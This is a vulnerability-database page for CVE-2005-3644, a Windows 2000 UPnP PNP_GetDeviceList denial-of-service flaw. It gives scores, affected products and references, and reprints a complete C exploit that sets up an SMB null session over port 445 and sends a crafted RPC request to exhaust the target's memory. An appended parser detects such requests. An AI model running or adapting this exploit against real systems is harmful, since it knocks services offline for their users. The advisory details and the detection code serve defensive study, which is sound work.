CVE-2005-3644
CVSS 7.8
Published: 2005-11-17 06:02:00
Revised: 2010-10-18 00:00:00

[Original] PNP_GetDeviceList (upnp_getdevicelist) in UPnP for Microsoft Windows 2000 SP4 and earlier, and possibly Windows XP SP1 and earlier, allows remote attackers to cause a denial of service (memory consumption) via a DCE RPC request that specifies a large output buffer size, a variant of CVE-2006-6296, and a different vulnerability than CVE-2005-2120.


[CNNVD] Microsoft Windows Plug and Play Denial of Service Vulnerability (CNNVD-200511-222)

        Microsoft Windows Plug and Play (PnP) allows the operating system to detect new hardware when it is installed.
        A denial-of-service vulnerability exists in the Microsoft Windows Plug and Play service. If an attacker can send a specially crafted request to upnp_getdevicelist, services.exe may consume excessive memory until the target machine's virtual memory is exhausted. Note that this vulnerability is unrelated to the one described in MS05-047.

- CVSS (base score)

CVSS score: 7.8 [HIGH]
Confidentiality impact: NONE [no impact on system confidentiality]
Integrity impact: NONE [no impact on system integrity]
Availability impact: COMPLETE [may bring the system down completely]
Access complexity: LOW [no access restrictions on exploitation]
Access vector: NETWORK [the attacker needs neither intranet nor local access]
Authentication: NONE [no authentication required for exploitation]

- CWE (weakness category)

CWE-399 [Resource Management Errors]

- CPE (affected platforms and products)

cpe:/o:microsoft:windows_2000::sp1:datacenter_server (Microsoft Windows 2000 Datacenter Server SP1)
cpe:/o:microsoft:windows_2000::sp3:datacenter_server (Microsoft Windows 2000 Datacenter Server SP3)
cpe:/o:microsoft:windows_xp::gold:professional (Microsoft Windows XP Professional Gold)
cpe:/o:microsoft:windows_2000::sp2:advanced_server (Microsoft Windows 2000 Advanced Server SP2)
cpe:/o:microsoft:windows_2000::sp2:professional (Microsoft Windows 2000 Professional SP2)
cpe:/o:microsoft:windows_2000::sp3:server (Microsoft Windows 2000 Server SP3)
cpe:/o:microsoft:windows_2000:::advanced_server
cpe:/o:microsoft:windows_2000:::professional
cpe:/o:microsoft:windows_2000::sp4:server (Microsoft Windows 2000 Server SP4)
cpe:/o:microsoft:windows_xp::sp1:home
cpe:/o:microsoft:windows_2000::sp1:professional (Microsoft Windows 2000 Professional SP1)
cpe:/o:microsoft:windows_2000:::datacenter_server
cpe:/o:microsoft:windows_xp:::media_center
cpe:/o:microsoft:windows_2000::sp3:professional (Microsoft Windows 2000 Professional SP3)
cpe:/o:microsoft:windows_xp:::home
cpe:/o:microsoft:windows_2000::sp1:server (Microsoft Windows 2000 Server SP1)
cpe:/o:microsoft:windows_2000::sp3:advanced_server (Microsoft Windows 2000 Advanced Server SP3)
cpe:/o:microsoft:windows_2000::sp2:datacenter_server (Microsoft Windows 2000 Datacenter Server SP2)
cpe:/o:microsoft:windows_xp::sp2:home
cpe:/o:microsoft:windows_xp::sp2:media_center (Microsoft Windows XP SP2 Media Center)
cpe:/o:microsoft:windows_2000:::server
cpe:/o:microsoft:windows_2000::sp4:datacenter_server (Microsoft Windows 2000 Datacenter Server SP4)
cpe:/o:microsoft:windows_xp::sp2:tablet_pc (Microsoft Windows XP SP2 Tablet PC)
cpe:/o:microsoft:windows_2000::sp1:advanced_server (Microsoft Windows 2000 Advanced Server SP1)
cpe:/o:microsoft:windows_2000::sp2:server (Microsoft Windows 2000 Server SP2)
cpe:/o:microsoft:windows_2000::sp4:professional (Microsoft Windows 2000 Professional SP4)
cpe:/o:microsoft:windows_xp::sp1:media_center (Microsoft Windows XP SP1 Media Center)
cpe:/o:microsoft:windows_2000::sp4:advanced_server (Microsoft Windows 2000 Advanced Server SP4)

- OVAL (technical details for detection)

No matching OVAL definition found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3644
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-3644
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200511-222
(Official data source) CNNVD

- Other links and resources

http://www.securityfocus.com/bid/15460
(UNKNOWN)  BID  15460
http://www.securiteam.com/exploits/6V00C15EKM.html
(UNKNOWN)  MISC  http://www.securiteam.com/exploits/6V00C15EKM.html
http://www.milw0rm.com/exploits/1328
(UNKNOWN)  MILW0RM  1328
http://www.microsoft.com/technet/security/advisory/911052.mspx
(VENDOR_ADVISORY)  MSKB  911052
http://www.frsirt.com/exploits/20051117.Win_upnp_getdevicelist.c.php
(VENDOR_ADVISORY)  MISC  http://www.frsirt.com/exploits/20051117.Win_upnp_getdevicelist.c.php
http://www.eeye.com/Resources/Security-Center/Research/Zero-Day-Tracker/2005/20051116
(UNKNOWN)  MISC  http://www.eeye.com/Resources/Security-Center/Research/Zero-Day-Tracker/2005/20051116
http://securitytracker.com/id?1015233
(UNKNOWN)  SECTRACK  1015233
http://secunia.com/advisories/17595
(VENDOR_ADVISORY)  SECUNIA  17595
http://research.eeye.com/html/alerts/zeroday/20051116.html
(UNKNOWN)  MISC  http://research.eeye.com/html/alerts/zeroday/20051116.html

- Vulnerability information

Microsoft Windows Plug and Play Denial of Service Vulnerability
High risk  Other
2005-11-17 00:00:00 2006-12-08 00:00:00
Remote

- Advisories and patches

        The vendor has not yet released a patch or upgrade; users of this software are advised to monitor the vendor's home page for the latest version:
        http://www.microsoft.com/technet/security/

- Vulnerability information (1328)

MS Windows 2k UPNP (getdevicelist) Memory Leak DoS Exploit (EDBID:1328)
windows dos
2005-11-16 Verified
0 Winny Thomas
/* 
 * Author: Winny Thomas
 *         Nevis Labs, Pune, INDIA
 *
 * Details: 
 * While working on the exploit for MS05-047 I came across a condition where
 * a specially crafted request to upnp_getdevicelist would cause 
 * services.exe to consume memory to a point where the target machine's virtual
 * memory gets exhausted. This exploit is NOT similar to the MS05-047 exploit I 
 * published earlier. The earlier one trashed the EIP of the target, causing a 
 * crash in services.exe, and eventually brought the system down. 
 * However, in this exploit (again a DoS) the virtual memory is consumed to a 
 * point where desktop requests (like clicking "My Computer"), HTTP requests,
 * SMB requests etc. do not get serviced for some time. After some time the 
 * memory usage comes down and the target system works as normal. However,
 * this code, when continuously executed against a target, leads to a sustained 
 * DoS attack.
 * Start the task manager on the target system and run this code against the 
 * target and watch the virtual memory usage shoot up.
 *
 * I used windbg to break on calls to upnp_getdevicelist when running this code.
 * However, even before the break point is hit the system becomes unresponsive. 
 * Strangely though, changing the operation number in the DCERPC request to 
 * something other than 0xa (upnp_getdevicelist) makes the DoS attempt
 * fail. Perhaps changing the payload a little bit, so that the underlying 
 * demarshalling routines don't return an error, might reproduce this effect
 * for other UPNP operations as well.
 *
 * TESTED ON: Windows 2000 Server SP0, SP2 and SP3. I have not tested this on
 * any of the above machines with the recent hot fixes for UPNP.
 * 
 * Note: This code is for educational/testing purposes by authorized persons on network systems set up for such purposes.
 * The author shall bear no responsibility for any damage caused by using this code. 
 */

#include <stdio.h>
#include <stdlib.h>     /* exit, rand, srand, system */
#include <string.h>     /* memcpy, strcmp, strlen */
#include <strings.h>    /* bzero */
#include <unistd.h>     /* close */
#include <time.h>       /* time */
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>

unsigned short ProcessID = 0;
unsigned short TID = 0;
unsigned short UserID = 0;
unsigned short FID = 0;

char peer0_0[] = 
"\x00\x00\x00\x85\xFF\x53\x4D\x42\x72\x00\x00\x00\x00\x18\x53\xC8"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFE"
"\x00\x00\x00\x00\x00\x62\x00\x02\x50\x43\x20\x4E\x45\x54\x57\x4F"
"\x52\x4B\x20\x50\x52\x4F\x47\x52\x41\x4D\x20\x31\x2E\x30\x00\x02"
"\x4C\x41\x4E\x4D\x41\x4E\x31\x2E\x30\x00\x02\x57\x69\x6E\x64\x6F"
"\x77\x73\x20\x66\x6F\x72\x20\x57\x6F\x72\x6B\x67\x72\x6F\x75\x70"
"\x73\x20\x33\x2E\x31\x61\x00\x02\x4C\x4D\x31\x2E\x32\x58\x30\x30"
"\x32\x00\x02\x4C\x41\x4E\x4D\x41\x4E\x32\x2E\x31\x00\x02\x4E\x54"
"\x20\x4C\x4D\x20\x30\x2E\x31\x32\x00" ;

char peer0_1[] = 
"\x00\x00\x00\xA4\xFF\x53\x4D\x42\x73\x00\x00\x00\x00\x18\x07\xC8"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFE"
"\x00\x00\x10\x00\x0C\xFF\x00\xA4\x00\x04\x11\x0A\x00\x00\x00\x00"
"\x00\x00\x00\x20\x00\x00\x00\x00\x00\xD4\x00\x00\x80\x69\x00\x4E"
"\x54\x4C\x4D\x53\x53\x50\x00\x01\x00\x00\x00\x97\x82\x08\xE0\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x57\x00\x69\x00\x6E\x00\x64\x00\x6F\x00\x77\x00\x73\x00\x20\x00"
"\x32\x00\x30\x00\x30\x00\x30\x00\x20\x00\x32\x00\x31\x00\x39\x00"
"\x35\x00\x00\x00\x57\x00\x69\x00\x6E\x00\x64\x00\x6F\x00\x77\x00"
"\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00\x30\x00\x20\x00\x35\x00"
"\x2E\x00\x30\x00\x00\x00\x00\x00";

char peer0_1_2[] = 
"\x00\x00\x00\xDA\xFF\x53\x4D\x42\x73\x00\x00\x00\x00\x18\x07\xC8"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFE"
"\x00\x08\x20\x00\x0C\xFF\x00\xDA\x00\x04\x11\x0A\x00\x00\x00\x00"
"\x00\x00\x00\x57\x00\x00\x00\x00\x00\xD4\x00\x00\x80\x9F\x00\x4E"
"\x54\x4C\x4D\x53\x53\x50\x00\x03\x00\x00\x00\x01\x00\x01\x00\x46"
"\x00\x00\x00\x00\x00\x00\x00\x47\x00\x00\x00\x00\x00\x00\x00\x40"
"\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x06\x00\x06\x00\x40"
"\x00\x00\x00\x10\x00\x10\x00\x47\x00\x00\x00\x15\x8A\x88\xE0\x48"
"\x00\x4F\x00\x44\x00\x00\xED\x41\x2C\x27\x86\x26\xD2\x59\xA0\xB3"
"\x5E\xAA\x00\x88\x6F\xC5\x57\x00\x69\x00\x6E\x00\x64\x00\x6F\x00"
"\x77\x00\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00\x30\x00\x20\x00"
"\x32\x00\x31\x00\x39\x00\x35\x00\x00\x00\x57\x00\x69\x00\x6E\x00"
"\x64\x00\x6F\x00\x77\x00\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00"
"\x30\x00\x20\x00\x35\x00\x2E\x00\x30\x00\x00\x00\x00\x00";

char peer0_2[] = 
"\x00\x00\x00\x58\xFF\x53\x4D\x42\x75\x00\x00\x00\x00\x18\x07\xC8"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFE"
"\x00\x08\x30\x00\x04\xFF\x00\x5A\x00\x08\x00\x01\x00\x2D\x00\x00";

char peer0_3[] = 
"\x00\x00\x00\x66\xff\x53\x4d\x42\xa2\x00\x00\x00\x00\x18\x07\xc8"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\xff\xfe"
"\x00\x08\x40\x00\x18\xff\x00\xde\xde\x00\x10\x00\x16\x00\x00\x00"
"\x00\x00\x00\x00\x9f\x01\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x40\x00\x00\x00"
"\x02\x00\x00\x00\x03\x13\x00\x00\x5c\x00\x62\x00\x72\x00\x6f\x00"
"\x77\x00\x73\x00\x65\x00\x72\x00\x00\x00";

char peer0_4[] = 
"\x00\x00\x00\x9A\xFF\x53\x4D\x42\x25\x00\x00\x00\x00\x08\x01\xC0"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\xFF\xFE"
"\x00\x08\x01\x00\x10\x00\x00\x48\x00\x00\x00\x48\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x52\x00\x48\x00\x52\x00\x02"
"\x00\x26\x00\x00\x40\x57\x00\x00\x5C\x00\x50\x00\x49\x00\x50\x00"
"\x45\x00\x5C\x00\x00\x00\x05\x00\x0B\x03\x10\x00\x00\x00\x48\x00"
"\x00\x00\x00\x00\x00\x00\xD0\x16\xD0\x16\x00\x00\x00\x00\x01\x00"
"\x00\x00\x00\x00\x01\x00\x40\x4E\x9F\x8D\x3D\xA0\xCE\x11\x8F\x69"
"\x08\x00\x3E\x30\x05\x1B\x01\x00\x00\x00\x04\x5D\x88\x8A\xEB\x1C"
"\xC9\x11\x9F\xE8\x08\x00\x2B\x10\x48\x60\x02\x00\x00\x00";

char peer0_5[] =
//NETBIOS Fields
//==============
"\x00"		//Message type
"\x00\x00\x80"  //Payload length 			C
//SMB Fields
//==========
//SMB Header
"\xFF\x53\x4D\x42\x2F\x00\x00\x00\x00\x18\x07\xC8"
"\x00\x00\x40\x6D\x4E\xF4\x8C\x6E\x13\x7B\x00\x00\x00\x08\xFF\xFE"
"\x00\x08\x00\x01"
//Write ANDX Request fields
"\x0E" //Word count
"\xFF\x00\xDE\xDE\x00\x40\x00\x00\x00\x00\xFF"
"\xFF\xFF\xFF\x08\x00"
"\x40\x00" //Remaining					C
"\x00\x00" //Data Length High
"\x40\x00" //Data Length Low				C
"\x40\x00" //Data Offset				C	
"\x00\x00\x00\x00" //High Offset
"\x41\x00" //Byte count					C
"\xEE"//Padding
//DCE RPC Request field
//=====================
"\x05\x00\x00\x03\x10\x00\x00\x00"
"\x40\x00" //Frag Length
"\x00\x00" //Auth Length
"\x8D\x00\x00\x00" //Call Id
"\x28\x00\x00\x00" //Alloc HINT				C
"\x00\x00"  //Context Id
"\x0A\x00"  //OpNum; 10 in our case for PNP_GetDeviceList
//DATA for GetDeviceList 
"\x00\x00\x00\x00"
"\x10\x10\x10\x10" //This is what kills the target. \x00\x00\x00\x00 is safe
"\x48\x54\x52\x45\x45\x5C\x52\x4F\x4F\x54\x5C"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00";

void send_packet(int sock, char *payload, int size,
char *type)
{
	int ntrans, ret;
	
	memcpy(&payload[30], &ProcessID, 2);
	
	if (UserID) 
		memcpy(&payload[32], &UserID, 2);
	if (TID)
		memcpy(&payload[28], &TID, 2);

	if (strcmp(type, "Sending DCE RPC Bind UPNPMGR request") == 0) {
		memcpy(&payload[67], &FID, 2);
	}
	if (strcmp(type, "UPNPMGR upnp_getdevicelist request") == 0) {
		memcpy(&payload[41], &FID, 2);
	}

	printf("[*] %s: ", type);
	fflush(stdout);
	ntrans = send(sock, payload, size, 0);
	if (ntrans < 0) {
		printf("\033[0;31mFailed\033[0;39m\n\n");
		exit(-1);
	}
}

void get_response(int sock, char *type)
{
	int ret;
	char response[1496];

	ret = recv(sock, response, 1496, 0);
	if (strcmp(type, "Null Session request 1") != 0) {
		if ((ret < 0 || response[9] != 0)) {
			printf("\033[0;31mError in %s response\033[0;39m\n\n", type);
			exit(-1);
		}
	}
	
	if (strcmp(type, "Null Session request 1") == 0) {
		UserID = *(unsigned short *)&response[32];
	}
	if (strcmp(type, "Tree Connect") == 0) {
		TID = *(unsigned short *)&response[28];
	}
	if (strcmp(type, "NT Creat AndX") == 0) {
		FID = *(unsigned short *)&response[42];
	}
	
	if (strcmp(type, "UPNPMGR upnp_getdevicelist") == 0)
{
		if((unsigned long)response[88] != 0) {
			printf("\033[0;31mnca_s_fault_ndr\033[0;39m\n\n");
			exit(-1);
		}
	}
	printf("\033[0;32mOK\033[0;39m\n");
}

void banner()
{

printf("\n\n\033[0;31m\t!------------------------------------------!\n\033[0;39m");
	printf("\033[0;31m\t Memory leak when sending upnp_getdevicelist request\n\033[0;39m");
	printf("\033[0;31m\t Coded by: \033[0;34m Winny Thomas :-)\n\033[0;39m");
	printf("\033[0;34m\t\t    NevisLabs\n\033[0;39m");
	printf("\033[0;34m\t\t    Nevis Networks, Pune, INDIA\n\033[0;39m");

printf("\033[0;31m\t!------------------------------------------!\n\n\033[0;39m");
}

/* Writes UNC as UTF-16LE into ptr followed by the "IPC" service string; the
   caller never used a return value, so the function is declared void. */
void setup_tCon(char *UNC, char *ptr)
{
	int pindex = 0, uindex = 0, len;	
	
	len = strlen(UNC);
	while (uindex < len) {
		if ((pindex % 2) != 0) {
			ptr[pindex] = '\x00';
			pindex++;
			continue;
		}

		ptr[pindex] = UNC[uindex];
		uindex++;
		pindex++;
	}

	ptr[pindex] = '\x00';
	pindex++;
	ptr[pindex] = '\x00';
	pindex++;
	ptr[pindex] = '\x00';
	pindex++;

	ptr[pindex] = 'I'; pindex++; ptr[pindex] = 'P'; pindex++; ptr[pindex] ='C'; pindex++;

	ptr[pindex] = '\x00';
	pindex++;
	ptr[pindex] = '\x00';
	pindex++;
}

int main(int argc, char *argv[])
{
	struct sockaddr_in target;
	struct hostent *host;
	char UNC[50], tConXpacket[150], *temp, targetIP[20];
	int sockfd;
	int ret, templen;
	
	system("clear");
	banner();

	if (argc < 2) {
		printf("Usage: %s <host name|ip address>\n\n", argv[0]);
		exit(-1);
	}
	
	srand(time(NULL));
	ProcessID = rand();

	printf("[*] Resolving %s: ", argv[1]);
	host = gethostbyname(argv[1]);
	if (!host) {
		printf("\033[0;31mFailed\033[0;39m\n");
		exit(-1);
	}
	printf("\033[0;32mOK\033[0;39m\n");
	
	target.sin_family = AF_INET;
	target.sin_addr = *(struct in_addr *)host->h_addr;
	target.sin_port = htons(445);
	sprintf(targetIP, "%s", inet_ntoa(target.sin_addr));
	
	sockfd = socket(AF_INET, SOCK_STREAM, 0);
	ret = connect(sockfd, (struct sockaddr *)&target, sizeof(target));
	if (ret < 0) {
		perror("Connect");
		exit(-1);
	}

	send_packet(sockfd, peer0_0, sizeof(peer0_0) -1, "Sending SMB Negotiate request");
	get_response(sockfd, "SMB Negotiate");	

	send_packet(sockfd, peer0_1, sizeof(peer0_1) -1, "Sending Null Session request");
	get_response(sockfd, "Null Session request 1");

	send_packet(sockfd, peer0_1_2, sizeof(peer0_1_2) -1, "Sending Null Session request");
	get_response(sockfd, "Null Session request 2");

	bzero(tConXpacket, 150);
	temp = tConXpacket;
	memcpy(tConXpacket, peer0_2, sizeof(peer0_2));
	temp += sizeof(peer0_2) -1;
	sprintf(UNC, "\\\\%s\\IPC$", targetIP);
	setup_tCon(UNC, temp);
	templen = (strlen(UNC)*2) +9;
	tConXpacket[3] = 43 + templen;
	templen -= 2;
	memcpy((unsigned long *)&tConXpacket[45], &templen, 1);

	send_packet(sockfd, tConXpacket, sizeof(peer0_2) +templen, "Sending Tree Connect request");
	get_response(sockfd, "Tree Connect");

	send_packet(sockfd, peer0_3, sizeof(peer0_3) -1, "Sending NT Creat AndX request");
	get_response(sockfd, "NT Creat AndX");

	send_packet(sockfd, peer0_4, sizeof(peer0_4) -1, "Sending DCE RPC Bind UPNPMGR request");
	get_response(sockfd, "DCE RPC Bind UPNPMGR");

	send_packet(sockfd, peer0_5, sizeof(peer0_5) -1, "UPNPMGR upnp_getdevicelist request");
	get_response(sockfd, "UPNPMGR upnp_getdevicelist");

	close(sockfd);
}

// milw0rm.com [2005-11-16]
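As an added defensive illustration (not part of the original page and not the exploit author's code): the 64-byte DCE RPC request portion of peer0_5 above is re-embedded as a constructed sample and run through a small parser for the connection-oriented DCE RPC request header (version, packet type, data representation, fragment length, auth length, call id, alloc hint, context id, opnum). The second 32-bit word of the stub data, which the exploit's own comment singles out as the value that triggers the condition, is treated here as the output-buffer length named in the CVE text; that mapping, the alerting threshold MAX_SANE_LENGTH, the benign sample with a length of 0x400 and all function names are assumptions of this example. The opnum 0x0a and the byte layout come from the page.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>

/* Connection-oriented DCE RPC request PDU header, 24 bytes (rpc_vers 5).
   Only the little-endian data representation is handled, as in the capture. */
struct dcerpc_request_hdr {
    uint8_t  rpc_vers, rpc_vers_minor, ptype, pfc_flags;
    uint8_t  drep[4];
    uint16_t frag_length, auth_length;
    uint32_t call_id, alloc_hint;
    uint16_t context_id, opnum;
};

#define DCERPC_PTYPE_REQUEST    0
#define DCERPC_HDR_LEN          24
#define PNP_GETDEVICELIST_OPNUM 0x0a    /* opnum 10 used in the page's request */
#define MAX_SANE_LENGTH         0x10000 /* assumed alerting threshold, not a Windows constant */

static uint16_t le16(const uint8_t *p) { return (uint16_t)(p[0] | (p[1] << 8)); }
static uint32_t le32(const uint8_t *p)
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) | ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Returns 0 on success, -1 when the buffer is too short, is not a version-5
   request PDU, uses big-endian data representation, or claims a fragment
   length outside the bytes actually present. */
int parse_dcerpc_request(const uint8_t *buf, size_t len, struct dcerpc_request_hdr *h)
{
    int i;
    if (len < DCERPC_HDR_LEN) return -1;
    h->rpc_vers = buf[0]; h->rpc_vers_minor = buf[1];
    h->ptype = buf[2];    h->pfc_flags = buf[3];
    for (i = 0; i < 4; i++) h->drep[i] = buf[4 + i];
    h->frag_length = le16(buf + 8);
    h->auth_length = le16(buf + 10);
    h->call_id     = le32(buf + 12);
    h->alloc_hint  = le32(buf + 16);
    h->context_id  = le16(buf + 20);
    h->opnum       = le16(buf + 22);
    if (h->rpc_vers != 5 || h->ptype != DCERPC_PTYPE_REQUEST) return -1;
    if (!(h->drep[0] & 0x10)) return -1;
    if (h->frag_length < DCERPC_HDR_LEN || h->frag_length > len) return -1;
    return 0;
}

/* Second 32-bit word of the stub data of a GetDeviceList request (the word the
   exploit comment singles out; assumed here to be the requested output length).
   Returns 0 for malformed PDUs, other opnums, or PDUs carrying an auth trailer. */
uint32_t getdevicelist_length_field(const uint8_t *buf, size_t len)
{
    struct dcerpc_request_hdr h;
    if (parse_dcerpc_request(buf, len, &h) != 0) return 0;
    if (h.opnum != PNP_GETDEVICELIST_OPNUM || h.auth_length != 0) return 0;
    if (h.frag_length - DCERPC_HDR_LEN < 8) return 0;
    return le32(buf + DCERPC_HDR_LEN + 4);
}

/* 1 = alert (length above threshold), 0 = benign or not a GetDeviceList
   request, -1 = malformed or truncated PDU */
int flag_getdevicelist_request(const uint8_t *buf, size_t len)
{
    struct dcerpc_request_hdr h;
    if (parse_dcerpc_request(buf, len, &h) != 0) return -1;
    return getdevicelist_length_field(buf, len) > MAX_SANE_LENGTH;
}

/* Constructed sample: the DCE RPC part of peer0_5 from the page (64 bytes). */
const uint8_t page_request[64] = {
    0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00, 0x40,0x00, 0x00,0x00,
    0x8d,0x00,0x00,0x00, 0x28,0x00,0x00,0x00, 0x00,0x00, 0x0a,0x00,
    0x00,0x00,0x00,0x00, 0x10,0x10,0x10,0x10,
    0x48,0x54,0x52,0x45,0x45,0x5c,0x52,0x4f,0x4f,0x54,0x5c,
    0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
    0x00,0x00,0x00,0x00,0x00,0x00
};

/* Constructed benign variant: identical except the length word is 0x400. */
const uint8_t benign_request[64] = {
    0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00, 0x40,0x00, 0x00,0x00,
    0x8d,0x00,0x00,0x00, 0x28,0x00,0x00,0x00, 0x00,0x00, 0x0a,0x00,
    0x00,0x00,0x00,0x00, 0x00,0x04,0x00,0x00,
    0x48,0x54,0x52,0x45,0x45,0x5c,0x52,0x4f,0x4f,0x54,0x5c,
    0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
    0x00,0x00,0x00,0x00,0x00,0x00
};

int main(void)
{
    printf("page request:   flag=%d length=0x%08x\n",
           flag_getdevicelist_request(page_request, sizeof page_request),
           (unsigned)getdevicelist_length_field(page_request, sizeof page_request));
    printf("benign request: flag=%d length=0x%08x\n",
           flag_getdevicelist_request(benign_request, sizeof benign_request),
           (unsigned)getdevicelist_length_field(benign_request, sizeof benign_request));
    printf("truncated PDU:  flag=%d\n", flag_getdevicelist_request(page_request, 20));
    return 0;
}
```

The parser deliberately rejects a PDU whose fragment length exceeds the bytes on hand instead of reading past the buffer, which is the same class of client-controlled-length mistake (CWE-399) that the record attributes to the service; a real sensor would additionally key on the interface bound in the preceding DCE RPC bind rather than on the opnum alone.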

- Vulnerability information

20916
Microsoft Windows UPnP GetDeviceList Remote DoS
Remote / Network Access Denial of Service
Loss of Availability
Exploit Public

- Vulnerability description

Unknown or Incomplete

- Timeline

2005-11-13 Unknown
Unknown Unknown

- Solution

Unknown or Incomplete

- References

- Vulnerability author

Unknown or Incomplete